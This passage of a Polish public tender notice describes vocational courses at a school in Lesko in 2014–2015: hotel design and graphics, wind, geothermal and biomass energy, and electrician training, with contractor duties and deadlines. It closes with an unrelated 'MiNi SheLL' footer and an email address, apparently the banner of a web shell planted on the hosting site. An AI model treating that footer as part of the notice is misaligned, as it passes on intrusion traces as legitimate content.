Znaczenie Designu w strategii działania hoteli, jego roli jako narzędzia rozwoju i wpływu na pozycję rynkową, wprowadzenie pojęcia wzoru, wzornictwa, designu w odniesieniu do działań kreatywnych, jak i świata kultury materialnej i działalności gospodarczej.
Sztuka skutecznej prezentacji wizerunku hotelu w kontaktach biznesowych na podstawie Steve-a Jobs-a
Zarządzania marką w branży kreatywnej.
Finansowania projektów w branży kreatywnej.
Międzynarodowa analiza nazw.
Marketing nowych mediów , wstęp do marketingu internetowego, narzędzia marketingu internetowego, komunikacja z agencjami interaktywnymi , planowanie kampanii on-line, budowanie marki w Internecie
Część warsztatowa: 30 h
Poprowadzenie projektu od koncepcji po jego realizacji w wybranej technice druku.
Warsztaty Brand Design - logotyp, identyfikacja, folder, wizytówka, plakat. 
Zapoznanie  z  technikami zadruku i uszlachetniania oraz z aktualnymi trendami obowiązującymi w designie -faktury, kolory, gramatury, predyspozycje surowca do wykorzystania w odpowiednich technikach druku. Techniki zadruku i uszlachetniania
Przygotowanie kompleksowej identyfikacji wizerunku hotelu  -MOCK-UP. 
Umiejętność zastosowania odpowiednich surowców  - tworzywa syntetyczne - do uzyskania oczekiwanych efektów w realizowanym projekcie - bilbord, neon, witryna.
Kompetencje graficzne
Wstęp do technologii informatycznych i graficznych 
Korzystanie z serwisów internetowych. 
Organizacja pracy z komputerem. 
Projektowanie serwisów internetowych. 
Podstawy języka HTML.
Narzędzia wspomagające projektowanie typu MOCK-UP. 
Serwisy internetowe - edytory stron internetowych typu WYSIWYG.
Wprowadzenie do systemów zarządzania treścią - CMS. 
Zasady doboru typografii, znaków i symboli graficznych. 
Elementy typografii.
Dobór czcionki i jej kroju.
Rodzaje znaków i symboli graficznych.
Podstawy grafiki wektorowej i grafiki rastrowej, zastosowanie grafiki rastrowej.
Narzędzia grafiki rastrowej - na przykładzie oprogramowania Adobe Photoshop.
Zastosowanie grafiki wektorowej.
Narzędzia grafiki wektorowej - na przykładzie oprogramowania CorelDraw , InDesign. 
Techniki fotografowania i obróbka zdjęć cyfrowych.
Techniki fotografowania - fotografowanie ludzi, fotografia portretowa.                  
Korekta i retusz fotografii. 
Fotomontaż obrazu. 
Przygotowywanie i skład publikacji do druku.
2.3.6. W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany do: 
1 Uzgodnienia z Zamawiającym harmonogramu  oraz programu zajęć i przedłożenia go Zamawiającemu przy podpisaniu umowy,
2 Przekazania  Zamawiającemu 15 kompletów materiałów szkoleniowych 
3 Realizacji przedmiotu zamówienia w formie wykładów, pokazów oraz ćwiczeń i zadań praktycznych kształtujących i doskonalących nabyte umiejętności
4 Zapewnienia wykładowców i tłumacza 
5 Zapewnienia niezbędnego sprzętu i wyposażenia do prowadzenia zajęć teoretycznych i praktycznych
6 Prowadzenie dziennika zajęć, list obecności,
7 Bieżącego informowania Zamawiającego o przypadkach nieobecności uczestników na zajęciach,
8 Wydania oryginałów i kserokopii zaświadczeń, certyfikatów ukończenia kursu w terminie 7 dni od zakoń-czenia realizacji przedmiotu zamówienia,
9 Ubezpieczenia uczestników od następstw nieszczęśliwych wypadków powstałych w związku z uczestnictwem w zajęciach,
10 Ponoszenia wszelkich kosztów niezbędnych w celu prawidłowej realizacji przedmiotu zamówienia, nie-przewidzianych w umowie, 
11 Złożenia Zamawiającemu w terminie 7 dni po zakończeniu realizacji przedmiotu zamówienia: dziennika zajęć, kompletu list obecności, potwierdzenia odbioru materiałów szkoleniowych, egzemplarza materiałów szkoleniowych  kserokopii zaświadczeń, certyfikatów ukończenia kursu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Organizacja kursu odzyskiwania energii wiatru.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.4. Przedmiot zamówienia.
Organizacja kursu odzyskiwania energii wiatru.
2.4.1. Okres realizacji kursu: od dnia podpisania umowy do 31.12.2014r - grupa 1 oraz od 01.01.2015r do 15.06.2015r - 2 grupa.
2.4.2. Uczestnicy kursu: 2 grupy x 5 uczniów
2.4.3. Wymiar czasowy kursu: 320h (2 x 160h/grupę), 1h = 45 minut.
2.4.4. Miejsce realizacji kursu: Miasto Lesko (ZSTiA)
2.4.5. W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany do: 
1 Uzgodnienia z Zamawiającym harmonogramu  oraz programu zajęć i przedłożenia go Zamawiającemu przy podpisaniu umowy. Kurs obejmuje zakres tematyczny który nie pokrywa się z podstawą programową na kierunku technik urządzeń i systemów energii odnawialnej i wykracza ponad podstawę programową
2 Przekazania  uczestnikom 10 kompletów materiałów szkoleniowych 
3 Realizacji przedmiotu zamówienia w formie wykładów, pokazów oraz ćwiczeń i zadań praktycznych kształtujących i doskonalących nabyte umiejętności
4 Zapewnienia wykładowców 
5 Zapewnienia niezbędnego sprzętu i wyposażenia do prowadzenia zajęć teoretycznych i praktycznych
6 Prowadzenie dziennika zajęć, list obecności,
7 Bieżącego informowania Zamawiającego o przypadkach nieobecności uczestników na zajęciach,
8 Wydania oryginałów i kserokopii zaświadczeń, certyfikatów ukończenia kursu w terminie 7 dni od zakończenia realizacji przedmiotu zamówienia,
9 Ubezpieczenia uczestników od następstw nieszczęśliwych wypadków powstałych w związku z uczestnictwem w zajęciach,
10 Ponoszenia wszelkich kosztów niezbędnych w celu prawidłowej realizacji przedmiotu zamówienia, nie-przewidzianych w umowie, 
11 Złożenia Zamawiającemu w terminie 7 dni po zakończeniu realizacji przedmiotu zamówienia: dziennika zajęć, kompletu list obecności, potwierdzenia odbioru materiałów szkoleniowych, egzemplarza materiałów szkoleniowych lub kserokopii zaświadczeń, certyfikatów ukończenia kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Organizacja kursu  z zakresu odzyskiwania energii geotermalnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.5. Przedmiot zamówienia.
Organizacja kursu  z zakresu odzyskiwania energii geotermalnej.
2.5.1. Okres realizacji kursu: od dnia podpisania umowy do 31.12.2014r - grupa 1 oraz od 01.01.2015r do 15.06.2015r - 2 grupa.
2.5.2. Uczestnicy kursu: 2 grupy x 5 uczniów
2.5.3. Wymiar czasowy kursu: 320h 2 x 160h na grupę, 1h = 45 minut.
2.5.4. Miejsce realizacji kursu: Miasto Lesko, ZSTiA
2.5.5. W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany do: 
1 Uzgodnienia z Zamawiającym harmonogramu  oraz programu zajęć i przedłożenia go Zamawiającemu przy podpisaniu umowy. Kurs obejmuje zakres tematyczny który nie pokrywa się z podstawą programową na kierunku technik urządzeń i systemów energii odnawialnej i wykracza ponad podstawę programową
2 Przekazania  uczestnikom 10 kompletów materiałów szkoleniowych 
3 Realizacji przedmiotu zamówienia w formie wykładów, pokazów oraz ćwiczeń i zadań praktycznych kształ-tujących i doskonalących nabyte umiejętności
4 Zapewnienia wykładowców 
5 Zapewnienia niezbędnego sprzętu i wyposażenia do prowadzenia zajęć teoretycznych i praktycznych
6 Prowadzenie dziennika zajęć, list obecności,
7 Bieżącego informowania Zamawiającego o przypadkach nieobecności uczestników na zajęciach,
8 Wydania oryginałów i kserokopii zaświadczeń, certyfikatów ukończenia kursu w terminie 7 dni od zakoń-czenia realizacji przedmiotu zamówienia,
9 Ubezpieczenia uczestników od następstw nieszczęśliwych wypadków powstałych w związku z uczestnic-twem w zajęciach,
10 Ponoszenia wszelkich kosztów niezbędnych w celu prawidłowej realizacji przedmiotu zamówienia, nie-przewidzianych w umowie, 
11 Złożenia Zamawiającemu w terminie 7 dni po zakończeniu realizacji przedmiotu zamówienia: dziennika zajęć, kompletu list obecności, potwierdzenia odbioru materiałów szkoleniowych, egzemplarza materiałów szkoleniowych lub kserokopii zaświadczeń, certyfikatów ukończenia kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Organizacja kursu  z zakresu uzyskiwani energii biomasy i biopaliw..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.6. Przedmiot zamówienia.
Organizacja kursu  z zakresu uzyskiwani energii biomasy i biopaliw.
2.6.1. Okres realizacji kursu: od dnia podpisania umowy do 31.12.2014r - grupa 1 oraz od 01.01.2015r do 15.06.2015r - 2 grupa.
2.6.2. Uczestnicy kursu: 2 grupy x 5 uczniów.
2.6.3. Wymiar czasowy kursu: 320h, 2 x 160h na grupę, 1h = 45 minut.
2.6.4. Miejsce realizacji kursu: Miasto Lesko, ZSTiA.
2.6.5. Zakres tematyczny kursu powinien obejmować między innymi: 
Zapoznanie z zasobami energetycznymi biomas w Polsce - drewno opałowe, odpady drewnopochodne, słoma itp. 
Zapoznanie z  typami upraw, technologiami upraw, agrotechniką i pielęgnacją plantacji, plony. 
Technologie produkcji biopaliw stałych - brykietowanie, paletyzacja.
Właściwości biopaliw stałych - normy i wymagania. 
Właściwości procesu spalania biomasy. 
Projekty ciepłowni biomasowych - zagadnienia logistyczne, ekonomiczne i ekologiczne. 
Baza surowcowa do produkcji biogazu. 
Technologie produkcji biogazu. Biogazowe układy kogeneracyjne. 
Potencjał rolnictwa dla potrzeb produkcji biopaliw płynnych. 
Technologia wytwarzania bioetanolu i biokomponentów
2.6.6. W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany do: 
1 Uzgodnienia z Zamawiającym harmonogramu  oraz programu zajęć i przedłożenia go Zamawiającemu przy podpisaniu umowy. Kurs obejmuje zakres tematyczny który nie pokrywa się z podstawą programową na kierunku technik urządzeń i systemów energii odnawialnej i wykracza ponad podstawę programową
2 Przekazania  uczestnikom 10 kompletów materiałów szkoleniowych 
3 Realizacji przedmiotu zamówienia w formie wykładów, pokazów oraz ćwiczeń i zadań praktycznych kształ-tujących i doskonalących nabyte umiejętności
4 Zapewnienia wykładowców 
5 Zapewnienia niezbędnego sprzętu i wyposażenia do prowadzenia zajęć teoretycznych i praktycznych
6 Prowadzenie dziennika zajęć, list obecności,
7 Bieżącego informowania Zamawiającego o przypadkach nieobecności uczestników na zajęciach,
8 Wydania oryginałów i kserokopii zaświadczeń, certyfikatów ukończenia kursu w terminie 7 dni od zakoń-czenia realizacji przedmiotu zamówienia,
9) Ubezpieczenia uczestników od następstw nieszczęśliwych wypadków powstałych w związku z uczestnic-twem w zajęciach,
10) Ponoszenia wszelkich kosztów niezbędnych w celu prawidłowej realizacji przedmiotu zamówienia, nie-przewidzianych w umowie, 
11) Złożenia Zamawiającemu w terminie 7 dni po zakończeniu realizacji przedmiotu zamówienia: dziennika zajęć, kompletu list obecności, potwierdzenia odbioru materiałów szkoleniowych, egzemplarza materiałów szkoleniowych lub kserokopii zaświadczeń, certyfikatów ukończenia kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Organizacja kursu elektryk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.7. Przedmiot zamówienia.
Organizacja kursu elektryk.
Kurs przygotowuje do egzaminu przed Energetyczną Komisją Kwalifikacyjną i pracy na stanowisku elektryka - eksploatacja urządzeń, instalacji i sieci elektroenergetycznych do 1 kV i powyżej 1 kV - grupa 1 świadectwa kwalifikacji E.
2.7.1. Okres realizacji kursu: od dnia podpisania umowy do 31.12.2014r - 60h oraz od 01.01.2015r do 15.06.2015r - 60h.
2.7.2. Uczestnicy kursu: 1 grupa x 7 uczniów
2.7.3. Wymiar czasowy kursu: 120h, 1h = 45 minut.
2.7.4. Miejsce realizacji kursu: Miasto Lesko, ZSTiA
2.7.5. Zakres tematyczny kursu powinien obejmować wymagania stawiane przez Rozporządzenie Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadanych kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci,  Dz. U. 03.89.828 - z późn. zm.
2.6.6. W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany do: 
1 Uzgodnienia z Zamawiającym harmonogramu  oraz programu zajęć i przedłożenia go Zamawiającemu przy podpisaniu umowy. Kurs obejmuje zakres tematyczny który nie pokrywa się z podstawą programową na kierunku technik urządzeń i systemów energii odnawialnej i wykracza ponad podstawę programową
2 Przekazania  uczestnikom 10 kompletów materiałów szkoleniowych 
3 Realizacji przedmiotu zamówienia w formie wykładów, pokazów oraz ćwiczeń i zadań praktycznych kształtujących i doskonalących nabyte umiejętności
4 Zapewnienia wykładowców 
5 Zapewnienia niezbędnego sprzętu i wyposażenia do prowadzenia zajęć teoretycznych i praktycznych
6 Prowadzenie dziennika zajęć, list obecności,
7 Bieżącego informowania Zamawiającego o przypadkach nieobecności uczestników na zajęciach,
8 Wydania oryginałów i kserokopii zaświadczeń, certyfikatów ukończenia kursu w terminie 7 dni od zakończenia realizacji przedmiotu zamówienia,
9 Ubezpieczenia uczestników od następstw nieszczęśliwych wypadków powstałych w związku z uczestnictwem w zajęciach,
10 Ponoszenia wszelkich kosztów niezbędnych w celu prawidłowej realizacji przedmiotu zamówienia, nie-przewidzianych w umowie, 
11 Złożenia Zamawiającemu w terminie 7 dni po zakończeniu realizacji przedmiotu zamówienia: dziennika zajęć, kompletu list obecności, potwierdzenia odbioru materiałów szkoleniowych, egzemplarza materiałów szkoleniowych lub kserokopii zaświadczeń, certyfikatów ukończenia kursu.
12 Poniesienia kosztu egzaminu kwalifikacyjnego uczestników kursu przed Energetyczną Komisją Kwalifikacyjną w zakresie uprawnień grupy 1 E.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com